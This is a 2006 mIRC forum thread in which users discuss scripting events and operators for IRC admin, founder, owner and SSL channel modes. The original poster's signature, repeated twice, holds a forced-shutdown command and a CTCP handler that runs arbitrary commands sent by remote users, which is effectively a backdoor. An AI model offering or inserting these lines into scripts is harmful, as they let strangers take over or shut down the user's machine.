Print Thread
#143593 26/02/06 08:07 AM
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Well, since Rizon is now updating the ircd to include admin and founder modes, and I know that other networks have these modes as well, I was thinking it would be a nice addition to mirc to have command extensions to include these modes. Trying to update my scripts to reflect these modes is rather difficult when there is no easy way to check a few things without using rather roundabout ways. There were easy ways to check things like if the user is an op/hop/voice/reg but nothing for admin/founder or other modes that other ircd's may include, and since these other ircd's, that also have these modes, are quite popular, something like these would help a lot, for everyone.

on *:admin:#:
on *:deadmin:#:
on *:founder:#:
on *:defounder:#:

for control loops:
isadmin and isfounder

for ssl things, something like:
$nick(#,nick).isssl or just $isssl($nick)
perhaps even "isssl" in control loop type syntax

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
#143594 26/02/06 08:33 AM
S
Hoopy frood
Hoopy frood
S
I don't know if these will help you but..

on *:Owner:#:
on *:Deowner:#:

Not too sure if isowner is still in mIRC but the first 2 are they just aren't documented.

-Andy

#143595 26/02/06 08:43 AM
R
Hoopy frood
Hoopy frood
R
I think your isfounder idea (or maybe isadmin) would be covered by the (undocumented) isowner option.

This is listed in Teazle's help file, which is available (for 6.16) at mIRC Help by Teazle

As to the rest, here's my vote.

#143596 26/02/06 11:55 AM
S
Hoopy frood
Hoopy frood
S
There are so many differing views across IRCds across what admin/owner/founder/etc. are the it'd be very difficult for mIRC to support events so that each one corresponded correctly to each IRCd's own definition.

isfounder/isadmin can be checked using $nick(channel, nick, mode-prefix). I'm fairly certain this works, I'm sure I've used it in the past, but I honestly couldn't find a server with the appropriate non-standard modes to test it with. Which just goes to show that they're not all that popular really.

(de)founder/(de)admin events can be created using on rawmode and signals. I posted something to more or less do that on the scripting forum once before. You coul simply use that code as is, or you could edit/extend it so it checks the network or IRCd in use and creates fullblown (de)founder/(de)admin signals.

Spelling mistakes, grammatical errors, and stupid comments are intentional.
#143597 26/02/06 02:30 PM
M
Fjord artisan
Fjord artisan
M
Quote:
There are so many differing views across IRCds

Yeah it sure would be nice if they would stick to a standard,
it would still be possible to have a feature available or not,
like isadmin, isowner, SSL .. whatever, while sticking to a
standard of what these things mean and how they work. Also,
using the same symbols for the channel modes would be nice.
It just seems like they go ahead and screw whatever they want
around on their IRCd and the clients have to work feverishly
to try and keep up with the differences and changes.

Last edited by mIRCManiac; 26/02/06 02:35 PM.
#143598 26/02/06 03:00 PM
H
Hoopy frood
Hoopy frood
H
on owner/deowner will trigger when you receive/lost a . prefix. I'm not sure why it doesn't just go with the +q mode but it doesn't. You can also use the isowner operator to see if you're an owner on the channel.

If Rizon is going to use the more common ~ prefix then none of the above will be of any interest to you.

#143599 26/02/06 03:34 PM
J
Fjord artisan
Fjord artisan
J
on *:owner should in fact trigger for the +q (and deowner for -q) mode change so long as q exists in $nickmode regardless of the assosciated prefix shocked

"The only excuse for making a useless script is that one admires it intensely" - Oscar Wilde
#143600 26/02/06 10:21 PM
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Yes, currently I have something that makes use of the mode prefix, but I was more interested in the event changes, since i can't simply use on *:mode:{} to see a +q or a +a .. which is ~=+q=owner and &=+a=protect which I thought was rather consistent, at least, that's what i've been told. But thanks for the on *:owner:{} one at least.. it's a start... basically.. why I wanted such is for a script that counts how many times I change a certain mode, little fun statistics thing. So far I have:

on *:kick:#:if ($nick == $me) inc %power.kicks
on *:ban:#:if ($nick == $me) inc %power.bans
on *:op:#:if ($nick == $me) inc %power.ops
on *:help:#:if ($nick == $me) inc %power.hops
on *:voice:#:if ($nick == $me) inc %power.voices
on *:owner:#:if ($nick == $me) inc %power.founder

and as such wanted one for anything else, since parsin the on input all the time would be more of a hasstle, and really.. a last resort.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
#143601 28/02/06 06:13 PM
H
Hoopy frood
Hoopy frood
H
Whenever I've tried it I've only been able to use the events and the operator on IRCX servers that use .

Link Copied to Clipboard